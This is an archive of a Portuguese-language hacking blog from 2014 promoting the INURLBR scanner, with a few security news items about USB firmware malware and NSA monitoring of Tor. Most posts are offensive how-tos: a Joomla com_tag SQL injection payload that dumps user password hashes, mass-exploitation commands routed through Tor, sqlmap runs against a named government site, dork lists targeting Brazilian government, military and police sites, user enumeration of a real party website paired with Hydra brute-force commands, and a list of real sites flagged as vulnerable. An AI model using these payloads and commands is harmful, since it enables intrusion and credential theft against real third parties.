Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

quinta-feira, 31 de julho de 2014

USB possui brecha de segurança que não pode ser resolvida.

Black Hat 2014 desse ano promete viu ~

Dois pesquisadores de segurança estão prestes a divulgar uma descoberta sobre o USB que decreta o formato como um dos mais inseguros da atualidade.

Karsten Nohl e Jakob Lell construíram provas de conceito indicando que é possível contaminar uma unidade USB sem tocar na memória flash, focando apenas no firmware que controla suas funções.  Isso significa que nem a varredura mais completa encontraria o arquivo malicioso, e que qualquer coisa que use saída USB pode ser infectada - incluindo periféricos como teclado e mouse, além de pendrives.  Eles conseguiram colocar malwares nos chips usados para conectar um dispositivo ao computador e esses arquivos maliciosos são capazes de controlar funções e alterar pastas, além de direcionar o tráfego da internet a sites de interesse do atacante. Tudo sem serem notados.  O USB pode infectar o computador ou ser infectado por ele, e em nenhum dos casos o usuário comum tem chance de descobrir. Apenas um especialista com conhecimentos em engenharia reversa poderia encontrar o problema, mas só se estivesse procurando - e o firmware não costuma levantar suspeitas.  Os pesquisadores mostrarão como isso funciona durante a Black Hat, conferência anual sobre segurança que ocorre na semana que vem em Las Vegas, na intenção de estimular as pessoas a tomarem cuidado com o USB, porque este é um problema sem solução.  O que Nohl e Lell pretendem com a divulgação de suas descobertas é fazer um alerta para que as pessoas tratem dispositivos como pendrives da mesma forma que tratam seringas: cada um só pode usar o seu. É a única forma de garantir que não haverá complicações.  Nesta nova forma de pensar, você tem que considerar uma USB infectados e jogá-lo fora assim que ele toca em um computador não-confiável. "



Karsten Nohl e Jakob Lell construíram provas de conceito indicando que é possível contaminar uma unidade USB sem tocar na memória flash, focando apenas no firmware que controla suas funções.

Isso significa que nem a varredura mais completa encontraria o arquivo malicioso, e que qualquer coisa que use saída USB pode ser infectada - incluindo periféricos como teclado e mouse, além de pendrives.

Eles conseguiram colocar malwares nos chips usados para conectar um dispositivo ao computador e esses arquivos maliciosos são capazes de controlar funções e alterar pastas, além de direcionar o tráfego da internet a sites de interesse do atacante. Tudo sem serem notados.

O USB pode infectar o computador ou ser infectado por ele, e em nenhum dos casos o usuário comum tem chance de descobrir. Apenas um especialista com conhecimentos em engenharia reversa poderia encontrar o problema, mas só se estivesse procurando - e o firmware não costuma levantar suspeitas.

Os pesquisadores mostrarão como isso funciona durante a Black Hat, conferência anual sobre segurança que ocorre na semana que vem em Las Vegas, na intenção de estimular as pessoas a tomarem cuidado com o USB, porque este é um problema sem solução.

O que Nohl e Lell pretendem com a divulgação de suas descobertas é fazer um alerta para que as pessoas tratem dispositivos como pendrives da mesma forma que tratam seringas: cada um só pode usar o seu. É a única forma de garantir que não haverá complicações.

Nesta nova forma de pensar, você tem que considerar uma USB infectados e jogá-lo fora assim que ele toca em um computador não-confiável. "

Nohl e Lell, os investigadores para a consultoria de segurança SR Labs, estão longe de ser o primeiro a apontar que os dispositivos USB pode armazenar e espalhar malware. Mas os dois hackers não se limitou a copiar as suas próprias infecções com códigos personalizados para a memória de dispositivos USB '. Eles passaram meses engenharia reversa do firmware que executa as funções básicas de comunicação de dispositivos USB-os chips controladores que permitem que os dispositivos para se comunicar com um computador e permitir que os usuários mover arquivos dentro e fora deles. Sua descoberta central é que firmware USB, que existe em diferentes formas em todos os dispositivos USB, pode ser reprogramado para esconder código de ataque. "Você pode dar a seu povo em segurança de TI, eles digitalizá-lo, apagar alguns arquivos, e dá-lo de volta para você dizendo que é 'clean'", diz Nohl. Mas a menos que o cara de TI tem as habilidades de engenharia reversa para encontrar e analisar se o firmware, "o processo de limpeza nem sequer tocar os arquivos de que estamos falando."

http://www.wired.com/2014/07/usb-security/

terça-feira, 29 de julho de 2014

Vídeo Aula - Script InurlBr + SQLMAP + DecrypterMD5


Uma simples demonstração de funcionamento do SCANNER INURLBR junto com SQLMAP e DECRYPTERMD5.


 Comandos utilizado:

php inurlbr.php --dork 'inurl:especialidades.php?id= site:gob.pe' --exploit-get '%27' -q 6 -s inurl_result.txt -p socks5://googleinurl@localhost:9050 --tor-random

Opções:

--dork = Define a dork que sera utilizada nos motores de busca
--exploit-get = Define o exploit via get, que será injetado em cada URL encontrada
-q = Define o motor de busca (ex.: google, bing, yahoo e etc...)
-s = Define o arquivo de saída, onde será armazenada as URLS encontradas
-p = Define o proxy para manter o anomimato
--tor-random = Habilita a função do tor randomico, a cada execução do script, o TOR muda de IP

Maiores detalhes:
https://github.com/googleinurl/SCANNER-INURLBR

Comando SQLMAP:
sqlmap --tor --tor-type=SOCKS5 -u http://sitevull.gob.pe/ --current-db --time-sec 10

Para utilizar o parametro "--tor" é necessário que esteja rodando localmente na porta 9050

Parrot e derivados: # service tor start

Verificar se está rodando: # netstat -an | grep 9050

tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN


Comando utilizado DECRYPTERMD5:

php md5.php --md5 HASH --proxy socks5://googleinurl@localhost:9050

Opções:

--md5 = Informando o tipo do HASH
--proxy = Ativando o proxy para anomimato

Para maiores informações utilize: # php md5.php --help

É isso ai ;-)

segunda-feira, 28 de julho de 2014

INURLBR API face V1.0 - PESQUISA DE DADOS PUBLICOS FACEBOOK

Script feito em php que pesquisa dados públicos através de requests do próprio facebook.
Temos acesso ao seguinte resultado:

     ID::
    USERNAME::
    NOME::
    PRIMEIRO NOME::
    SOBRENOME::
    SEXO::
    LOCAL::
    FOTO LOGO PEQUENA::
    FOTO LOGO GRANDE::
    FOTO LOGO::
    FOTO::


Exemplo de uso:

[+] Pesquisa dados facebook, Ex: php face.php zuck

[ RETORNO ]
INURLBR API face V1.0 - PESQUISA DE DADOS PUBLICOS FACEBOOK

Baixar:: http://pastebin.com/TdfymVXr

Dorks variadas voltadas pra sqlinjection.

Busca erros sql sites .gov, falhas fbconnect_action e outras variantes de erros.
Dorks variadas voltadas pra sqlinjection.


site:.websiteseguro.com inurl:produto.php?id=
site:.com /ccbill/  "DOCUMENT_ROOT" ext:cgi
inurl:game.php?id=
inurl:mil inurl:"/?fbconnect_action=myhome"
site:.gov.br "Microsoft OLE DB Provider"
site:.esporte.gov.br ext:asp
site:.esporte.gov.br (id|new|ver)
site:.esporte.gov.br (id|new|ver)
site:.psdb.org.br ext:asp id
site:.websiteseguro.com inurl:produto.php?id=
site:.globo.com ext:php mysql_
site:.gov.br .php?id= syntax; -pdf -policiacivil
site:.gov.br SQL "syntax;"
site:.ap.gov.br "SQL syntax;" ext:php
site:.gov.br ext:sql -svn
site:.nsa.gov PDF -public_info
site:.mil.br "mil br" index.php?option= view
site:.com inurl:tinybrowser ext:php intitle: TinyBrowser
site:.gov.br (error) mysql (prefeitura) ext:php -pdf
site:br index.php?option=com_user
site:.gov.br .php?id= syntax;
site:.gov.br ext:php (id*=|view=)
site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection"
site:rj.gov.br (php|asp|aspx) ? id
site:.gov.br syntax; -pdf inurl:(|&id=|?id=|)
site:br ext:asp (id*=|view=) 80040E14
site:.com.br ext:asp (id*=|view=) 80040E14 -superasp
site:.anatel.gov.br ext:asp
site:.gov.br (php|asp|aspx) ? id notic
site:.mg.gov.br (php|asp) ?id=
intitle:camara site:.gov.br ext:php (id*=|view=)
intitle:camara site:.gov.br ext:php (id*=|view=) -projetodomhelder
intitle:prefeitura site:.gov.br ext:php (id*=|view=) syntax;
inurl:?fbconnect_action= myhome&fbuserid=*
site:br inurl:view.php?id=* ext:php -Bug -moodle
site:.com.br inurl:"ver_news.php?id="
site:.ceara.gov.br ext:asp
site:.sp.gov.br inurl:.php? intext:"Warning" -policiacivil
intext:"vBulletin" inurl:install/upgrade.php
site:.ceara.gov.br ext:asp
site:.ceara.gov.br ext:asp "*.asp?" "=*"
inurl:.policiacivil.sp.gov.br modules
inurl:.policiacivil.sp.gov.br modules ".php?"
inurl:"/?fbconnect_action=myhome"
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
site:.ar inurl:fbconnect_action= fbuserid= intext:User
site:.ar inurl:fbconnect_action= fbuserid=
inurl:fbconnect_action= fbuserid= intext:User
(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) inurl:fbconnect_action= fbuserid= intext:User
(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php (id*=|view=)
inurl:(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php  inurl:pageid?
inurl:.policiacivil.sp.gov.br modules
site:sp.gov.br "Warning:" ext:php

quinta-feira, 24 de julho de 2014

Introdução SCANNER INURLBR V1.0

Introdução SCANNER INURLBR V1.0
[+]  Introdução  
*Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a validação personalizada interna para cada alvo/url encontrada.
*Captura de emails.
*Execução de comandos direto no console para cada possível vulnerável. *Execução de comandos direto no console para todo alvo encontrado.  *Analise de urls com base em arquivo txt, sem necessidade de usar motor de busca. *Definição de proxy. *Opção proxy TOR randômico.
_____
(_____)
(() ())
\   /
\ /
/=\
[___]
[INURLBR V1.0]
------------------------------------------------------------------------------


Explicando comando -q
Que é responsável por definir qual motor de busca vai efetuar os trabalhos.

-q tem acesso a 12 motores de busca.
1   - www.google.com.br
2   - www.bing.com
3   - br.search.yahoo.com
4   - www.ask.com
5   - search.hao123.com.br
6   - ajax.googleapis.com
7   - search.lycos.com
8   - busca.uol.com.br
9   - us.yhs4.search.yahoo.com
10  - pesquisa.sapo.pt
11  - www.dmoz.org
12  - www.gigablast.com
all  - todos motores de busca
Default:    1
Exemplo: -q {op}
Uso:
         -q 1 
         -q 5
Múltiplos motores  -q 1,2,5,6,11
Todos motores        -q all
Ex:
-----------------------------------------------------------------------------------------------------------------------------------
./inurlbr.php --dork 'site:br php?id=' -q 1,6 -s arquivo.txt --exploit-get "'´0x27"
-----------------------------------------------------------------------------------------------------------------------------------
0xVÍDEO[1]:

0xVÍDEO[2] - PARROT OS:
0xVÍDEO[2] - Usando Exploit joomla

  
0xDetalhes:

 * joomla component com_tag (tag_id) SQL Injection Vulnerability
 * [Joomla componente]
 * com_tag (tag_id) Vulnerável a SQL-injection

0xCOMANDOS INURLBR:

./inurlbr.php --dork 'inurl:option=com_tag' -q 1,6 -s joomla.txt -t 3 --exploit-get '/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component' -a 'Edit Tags'


0xDOWNLOAD SCRIPT
https://github.com/googleinurl/SCANNER-INURLBR

Ref:
http://blog.inurl.com.br/2014/07/joomla-component-comtag-tagid-sql.html

segunda-feira, 21 de julho de 2014

Testando novo Scanner inurl beta

BETA - Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a captura de emails & validação personalizada interna para cada alvo/url encontrada.
#ZEND FRAMEWORK,#ERROS MYSQL,#ERROS MICROSOFT,#ERROS JDBC,#ERROS ORACLE,#ERROS POSTGRESQL,#ERROS PHP,#ERROS ASP,#ERROS LUA,#ERROS INDEFINIDOS

                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]

#####################################
#GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
#SCRIPT NAME: INURLBR
#AUTOR:    Cleiton Pinheiro
#Nick:     Googleinurl
#Blog:     http://blog.inurl.com.br
#twitter: /@googleinurl
#facebook: /InurlBrasil
#Versão:  1.0
#-------------------------------------------------------------------------------
#PHP Version         5.4.7
#php5-curl           LIB
#php5-cli            LIB 
#cURL support        enabled
#cURL Information    7.24.0
#Apache              2.4
#allow_url_fopen     On
#permission          Reading & Writing
#User                root privilege, or is in the sudoers group
#Operating system    LINUX
#Proxy random        TOR               
#####################################

[YOUTUBE]
https://www.youtube.com/watch?v=_zpYVreCR_w

Testando novo Scanner inurl 1.0 beta

Testando novo Scanner inurl 1.0 beta


http://pastebin.com/Tb0Qp0qY

sexta-feira, 18 de julho de 2014

DecrypterMD5 API

[ INURLBR API DecrypterMD5  ]
 bdbbe98d4714585c4a2eae76cd0e3cae
xNeither war between hackers, nor peace for the system.
----------------------------------------------------------------------------------
[+] Pesquisa por arquivo, Ex: php md5.php --file filemd5.txt
[+] Pesquisa simples, Ex: php md5.php --md5 21232f297a57a5a743894a0e4a801fc3
                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]



INURLBR API DecriptMD5
----------------------------------------------------------------------------------
INURLBR API DecriptMD5  RESULTADOS

Proxy camuflagem envio de request.
- Exemplo: --proxy {proxy:porta}
- Uso:        --proxy localhost:8118
                  --proxy socks5://googleinurl@localhost:9050
                  --proxy http://admin:[email protected]:8080

O uso da rede TOR no script garante que você não seja bloqueado em requisições massivas.

Baixar:: http://pastebin.com/grYTVJKF

terça-feira, 15 de julho de 2014

ALGORITHM filme sobre hacking

<the_hacker_movie>

No centro da trama de ALGORITMO são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia

No centro da trama de ALGORITHM são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia.

Primeiro Trailer

http://www.thehackermovie.com/

QUEBRAR SENHA DO ROOT com live CD


QUEBRAR SENHA DO ROOT
QUEBRAR SENHA DO ROOT
Acessando seu disco rígido com live CD.
Monta a partição, por exemplo: $mount /dev/sda2/ /mnt
Caso não tenha a pasta mnt crie ela:  mkdir /mnt

Acessa a partição/sistema com o chroot: $chroot /mnt /bin/bash

Agora todo comando que for efetuado no terminal vai ser executado na maquina real,
Ou seja trocar a senha root do seu usuário
Ex:
$passwd usuário
$passwd root

Existe outra forma

Depois de montar a partição e executar o comando chroot


sudo gedit /etc/shadow

Primeira linha algo assim
root:AQUI_TEM_SENHA:16100:0:99999:7:::
Ex: root:$6$DsDwdas$4xFds.EfzTJl3I:16100:0:99999:7:::
Apague a senha
Vai ficar algo assim:
root::16100:0:99999:7:::

Feche o arquivo e salvando o mesmo, logo depois reinicia a maquina sem o cdlive.

E troque a senha do root, o mesmo serve para outros usuários.

$passwd root

quinta-feira, 3 de julho de 2014

joomla component com_tag (tag_id) SQL Injection Vulnerability

[Joomla componente]
[X] com_tag (tag_id) Vulnerável a SQL-injection


0xDORK[0]: inurl:option=com_tag
0xExploit[0]: /index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component 


Exemplo: 


http://WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=1

/index.php?option=com_tag&controller=tag&task=add&article_id=-ID{vull}

Injetando:

http://
WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component

RESPOSTA:

[X] com_tag (tag_id) Vulnerável a SQL-injection



REF:http://www.exploit-id.com/web-applications/joomla-component-com_tag-tag_id-sql-injection-vulnerability

ALGUNS RESULTADOS:
Usando scanner INURLBR:
Usando scanner INURLBR:
REPOSITÓRIO::: http://pastebin.com/Tb0Qp0qY

XKeyscore exposto: NSA define todos os utilizadores da rede Tor alemães como "extremistas".

XKeyscore exposto:  NSA define todos os utilizadores da rede Tor alemães como "extremistas".


A NSA foi revelado para marcar e considerar potenciais "extremistas" todos os usuários do serviço de internet anonymizer Tor. Entre aqueles que são centenas de milhares de pessoas preocupadas privacidade como jornalistas, advogados e ativistas de direitos.

Procurando software de criptografia, como o sistema operacional baseado em Linux Tails também coloca você no grid NSA, como Lena Kampf, Jacob Appelbaum e John Goetz revelado no site alemão Tagesschau. O relatório é baseado na análise do código-fonte do software usado por um programa de vigilância eletrônica XKeyscore da NSA.

Tor é um sistema de servidores, que encaminha as solicitações de usuários por meio de uma camada de conexões seguras para torná-lo impossível identificar IP de um usuário a partir dos endereços dos sites que ele / ela visita. A rede de cerca de 5.000 é operado por entusiastas e usado por centenas de milhares de pessoas de privacidade-preocupado todo o mundo. Alguns deles vivem em países com regimes opressivos, que punem os cidadãos para visitar sites que considerem inapropriado.

Mas o site apenas visitar projeto Tor coloca você na lista vermelha da NSA, diz o relatório. Mas o mais importante é que ele monitora as conexões com os chamados Autoridades Directory, os oito servidores, que atuam como gateways para todo o sistema.

A NSA foi particularmente vigiar alemão baseado Autoridades Diretório Tor. Uma é operado pelo grupo de hackers com sede na Alemanha Chaos Computer Club, o outro pelo estudante de ciência da computação Sebastian Hahn, que disse aos jornalistas que a revelação é "chocante".

O sistema em si não parece ser comprometida no entanto, mas a NSA recebe dados como endereços IP de quem o utiliza, o suficiente para cross-referenciá-los com outras bases de dados da agência tem acesso.

 Rede anonymizer Tor entre as metas da NSA, vazamentos Snowden revelar

Há indícios de que a NSA pode ser de coleta não só os metadados das pessoas na lista, mas também ler as suas trocas de e-mail com Tor.

Um interesse em Tor não é a única maneira de fazê-lo a lista de vigilância da NSA. Até mesmo buscas na web para outro software de criptografia faz de você um alvo, bem como, segundo o relatório.

Perturbadoramente, comenta programador NSA na etiqueta de código fonte desses pego pelo sistema americano "extremistas".

O relatório diz que XKeyscore marca todas as pessoas que atingiram a luz vermelha em sua grade, com excepção dos conectando de membros dos cinco olhos, um grupo de países a cooperar na recolha de informações, ou seja, os EUA, Reino Unido, Canadá, Austrália e Nova Zelândia .

Fonte: http://rt.com/news/170208-nsa-spies-tor-users/

segunda-feira, 23 de junho de 2014

[Dumb0] extração de usuários + HYDRA força bruta em formularios web


 [Dumb0] + HYDRA

 Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.

baixar: git clone https://github.com/0verl0ad/Dumb0.git
projeto: https://github.com/0verl0ad/Dumb0/


CMS que podemos extrair:
            SMF        --         Simple Machine Forums
            IPB          --        Invision Power Board
            XEN        --        Xen Foro
            VB          --        vBulletin
            myBB     --
            useBB    --
            vanilla  --
            bbPress  --
            WP     --        WordPress
            SPIP     --        SPIP CMS
            DRUPAL   --        Drupal
            MOODLE      --        Moodle
            BEE     --        Beehive Forums
            FLUX     --        fluxBB
            FUD     --        FUDforum
            punBB     --
            ACM     --        AcmImBoard XD
            BURN     --        Burning Board
            COM     --        Community Servers
            deluxeBB --       
            fusionBB --
            JFORUM     --
            JITBIT      --        Jibit ASPNetForum
            JIVE     --        Jive Forums
            NEAR     --        Near Forums
            OVBB     --       
            TikiWiki --        TikiWiki CMS-Groupware
Usando:
 Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.

Comando
Dumb0 ex:
perl dumb0.pl --url=[SEU_ALVO URL] --type=[CMS/FORUM ID] {OPTIONS: --log=[SESSION COOKIE] --file[FILENAME] }


Uma vez identificado o CMS-usuarios podemos direcionar um ataque de força bruta contra eles via hydra.
Usando Hydra:

hydra URL http-form-post "/Path/archivo.php:ParametroUser=^USER^&parametroPass=^PASS^:MSG QUE INDICA FALHA" -L seus_user.txt -P senhas.txt

Sintaxe simples fica assim :
 --------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:Usuario ou senha invalida"

--------------------------------------------------------------------------------
 Para criar esta sintaxe foi preciso : Valor do atributo action do
 <form> : logar.php Valor do atributo referente ao nome e senha de usuário nas tags <input> dentro do <form>: name , pass Mensagem de erro ou parte dela: "Usuário ou senha invalida" - O uso do caractere coringa é permitido : .*senha invalida - É possível usar uma mensagem de sucesso adicionando S= antes da mensagem :
 --------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:S=Logado com sucesso"

--------------------------------------------------------------------------------


Exemplo de resultado Dumb0:
alvo:http://www.psdb-mg.org.br/

perl Dumb0.pl --type=WP --url='http://www.psdb-mg.org.br/' --file='ps.txt'

RESULTADO:

[!] Dumping users from http://www.psdb-mg.org.br/...

[+] Posible user found ~> admin &#8211; PSDB - MG
[+] Posible user found ~> psdb &#8211; PSDB - MG
[+] Posible user found ~> psdbjovem &#8211; PSDB - MG
[+] Posible user found ~> psdbmulher &#8211; PSDB - MG
[+] Posible user found ~> psdbsindical &#8211; PSDB - MG
[+] Posible user found ~> itv &#8211; PSDB - MG
[+] Posible user found ~> Alias &#8211; PSDB - MG
[+] Posible user found ~> tucanafro &#8211; PSDB - MG
[!] Work finished


Depois de terminado o scan de users, agora direcionar seu ataque de força bruta com Hydra.

REF:http://blog.0verl0ad.com/2014/02/dumb0pl-herramienta-para-extraer.html
REF:http://www.exploit-db.com/papers/18939/

Ferramenta Simple SQLi Dumper v5.1 - Tool

   Simple SQLi Dumper v5.1 - Tool 

   Simple SQLi Dumper v5.1 - Tool
Procura bugs,erros ou vulnerabilidades em aplicações que usem MySQL database.
Funções:
  1. SQL Injection,
  2. Operation System Function,
  3. Dump Database,
  4. Extract Database Schema,
  5. Search Columns Name,
  6. Read File (read only),
  7. Create File (read only),
  8. Brute Table & Column

Baixar:http://pastebin.com/ZGk5DKYa

sexta-feira, 20 de junho de 2014

DORK encontra erros non-object

Procurando notícias sobre erros de tratamentos PDO ou simples consultas SQL/Objetos.

Procurando notícias sobre erros de tratamentos PDO ou simples consultas SQL/Objetos.


 ----------------------------------------------------------------------------------------------------------------------------
DORK:
inurl:br  intext:"Warning" || intext:"notice" "non-object in /" -"Revista PHP" -inurl:forum.
----------------------------------------------------------------------------------------------------------------------------
DORK encontra erros non-object
0xHOST GOOGLE........: www.google.com.br
0xDORK...............: inurl:br   intext:"Warning" || intext:"notice" "non-object in /" -"Revista PHP" -inurl:forum.
0xEXPLOIT............:
0xARQUIVO............: resultados.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: non-object in
0xCOMANDO TERMINAL...: ping -c _ALVO_
0xIP PROXY...........:
0xPORTA..............:

----------------------------------------------------------------------------------------------------------------------------

DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => non-object in
    [cmd] => ping -c _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.&num=1900&btnG=Search
    [port] => 80
)
RESULTADO:

TOTAL DE URL's: 196
EXPLOIT USADO:
DORK: inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.
TOTAL DE POSSÍVEIS VULL: 78
ARQUIVO COM RESULTADO:resultados.txt
LISTA:

http://www.congressomedicopf.com.br/3/5/local
http://webcache.googleusercontent.com/search?q=cache:mHMik8Hn39cJ:http://www.congressomedicopf.com.br/3/5/local%2Binurl:br+++intext:%22Warning%22+%7C%7C+intext:%22notice%22+%22non-object+in+/%22+-%22Revista+PHP%22+-inurl:forum.&num=1900&hl=pt-BR&&ct=clnk
http://www.minhaentrada.com.br/evento/b
http://webcache.googleusercontent.com/search?q=cache:dujAQvNUaScJ:http://www.minhaentrada.com.br/evento/b%2Binurl:br+++intext:%22Warning%22+%7C%7C+intext:%22notice%22+%22non-object+in+/%22+-%22Revista+PHP%22+-inurl:forum.&num=1900&hl=pt-BR&&ct=clnk
http://www.3dcloner.com.br/post/conteudo-2/6/
http://www.gaiaexp.com.br/circuito-gaiaexp-trekking/pousada-sao-joao-da-mata/calendario-de-provas
http://www.phipasa.com.br/videos.php?id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/storage/1/e8/f2/phipasa/public_html/modulos/videos/box-videos.php%3C/b%3E%20on%20line%20%3Cb%3E25%3C/b%3E%3Cbr%20/%3E
http://colinas.to.gov.br/conteudo/mi-dengue/263
http://www.shoppingvilla-lobos.com.br/index.php?option=com_loja&view=&Itemid=&codloja=9926944
http://www.shoppingvilla-lobos.com.br/index.php?option=com_loja&view=loja&Itemid=3&codloja=%3Cbr%20/%3E_%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20property:%20stdClass::$COD_PESSOA%20in%20%3Cb%3ED:%5CSites%5Cshoppingvilla-lobos.com.br%5Ctemplates%5Csvl%5Chtml%5Ccom_loja%5Cloja%5Cdefault.php%3C/b%3E%20on%20line%20%3Cb%3E87%3C/b%3E%3Cbr%20/%3E_
http://www.ibiuna.sp.gov.br/cidadao_online/%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/storage/c/52/9a/ibiuna2/public_html/view/prefeituraibiuna/cidadao_online/index.php%3C/b%3E%20on%20line%20%3Cb%3E42%3C/b%3E%3Cbr%20/%3Ehttp://www.ibiuna.sp.gov.br/cidadao_online/
http://photosblackbox.com.br/evento/2
http://www.brasilatletismo.com.br/noticias/noticias-1/no-ultimo-salto-duda-garante-vaga-na-final
http://www.afmbs.org.br/site/galeria
http://www-antigo.mpmg.mp.br/portal/public/promotoria/buscarpromotoria?idPromotoria=99
https://novosite.uninorte.com.br/galeria/acao-integrada-de-administracao/img_1696/
http://add.capes.gov.br/index.php/pt-BR/metadado.html?view=metadado
http://www.opticasitamaraty.com.br/lojas/item/458-pantas6
http://moradadaviola.tvabcd.com.br/reprises/
http://www.shoppingtacaruna.com.br/alimentacao/ver/297
http://www.riomarrecife.com.br/index.php?option=com_loja&view=&Itemid=&codloja=3763
http://apianet.com.br/filiais.php
http://www.abramppe.org.br/
http://omelhornacopa.com.br/v2/2014/02/
http://www.onetreinamento.com.br/eventos/eventos/saibamais/id/567
http://www.zapatamexicanbar.com.br/promocao/105800
http://www.santuarioscj.com.br/noticias/noticias-da-paroquia/avisos-paroquiais
http://br.sosveterinariaes.com.br/?cat=8
http://www.andes-vertical.com/adventure.php/%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/ju000681/public_html/adventure.php%3C/b%3E%20on%20line%20%3Cb%3E140%3C/b%3E%3Cbr%20/%3E/0
http://www.mercadomineiro.com.br/index.php?m=empresa&id=556&empresa=Meta+Corpus+Pilates
http://www.theresinahall.com.br/videos/pr-poderoso-castiga--coletanea-2
http://www.houseekitchen.com.br/categoria/natal
http://www.inf.ufes.br/~rmanola/blog
http://www.fapesp.br/oportunidades/2000
http://liderinteriores.com.br/modulados/produto/office-linea
http://www.agmfr.com.br/index.php?option=com_events&task=view_detail&agid=9&year=2011&month=02&day=23&Itemid=52
http://www.grupoelogica.com.br/site/?go=clientes
http://www.criativa.com.br/trabalhos/
http://www.direitovirtual.com.br/diario-oficial/diario-tjpi-06082013-C10539.html
http://www.ceudecapella.com.br/einx/redirecionar-pagamento/2
http://caminhosviagens.com.br/viagem/caminhos-de-maria-C156774.html
http://www.jorlan.com.br/veiculo-novo.php?cid=Goiania
http://www.fundacaosemear.org.br/opinioes/detalhes/codigo/1
http://www.feiradocircuitodasmalhas.com.br/2014/camp-ex/
http://www.inpactopropaganda.com.br/novo/index.php/no-forno/97-campanha-70-anos-escritorio-sao-paulo
http://www.blogcentenario.unifei.edu.br/?page_id=2778
http://www.plaxmetal.com.br/componentes/0
http://www.motoryama.com.br/noticia/noticias_motoryama/7
http://www.onecursos.com.br/eventos/eventos/saibamais/id/692
http://www.datacom.ind.br/new/?q=pt-br/solucoes
https://www.pucci.eng.br/php_errors.log
http://www.ancoraengenharia.com.br/areas-de-atuacao/industriais
http://www.sepluga.com.br/
http://www.scvilaolimpia.com.br/index.php?option=com_loja&view=loja&Itemid=4&codloja=1938707
http://www.lwartimpermeabilizantes.com.br/destaques/destaque/chave/visita-tecnica---aplicadores
http://www.impressoramaster.com.br/loja/balcoes-retirada/campo-largo-rg-grafica-rapida-41-3469-2029
http://www.revistamissoes.org.br/artigos/ler/id/2601
http://www.bairroprado.com.br/detalhes-do-imovel/PR2530V/A0097
http://www.helbor.com.br/detalhes-da-noticia/imprensa/77
http://www.rzartmakeup.com.br/wordpress/portfolio_category/gloss/
http://www.jogosabertos2013.com.br/modalidade/bocha-pcd
http://www.spfilmagem.com.br/view.php?v=OVBRPT0=aae48a48d6e795eF8c90b0523dcaee7Y1ZOHYxTlIocFxpdA==MWE4ZGQxjk4NQ==M&i=WlBRPT0=2e0d3ae5c96fb6bw779a7910be8907cWVZYjA8ak5oLWVcMQ==MWE4ZGQxjk4NQ==M
http://www.fani.com.br/v2/index.php?page=produtos&cid=17
http://3pproducoes.com.br/servicos/
http://www.manoleeducacao.com.br/nutricaoclinica/programacao/aplicabilidade-da-bioimpedancia-eletrica-na-pratica-clinica
http://www.ciplak.com.br/destaques/destaque/chave/treinamento-rio-grande-do-norte
http://200.199.211.77/index.php/br/multimidia/imagens.html?folder=Aeroporto+de+Bras%C3%ADlia
http://quintadogolfe.com.br/clube/historia/
http://www.bolor.com.br/fotos
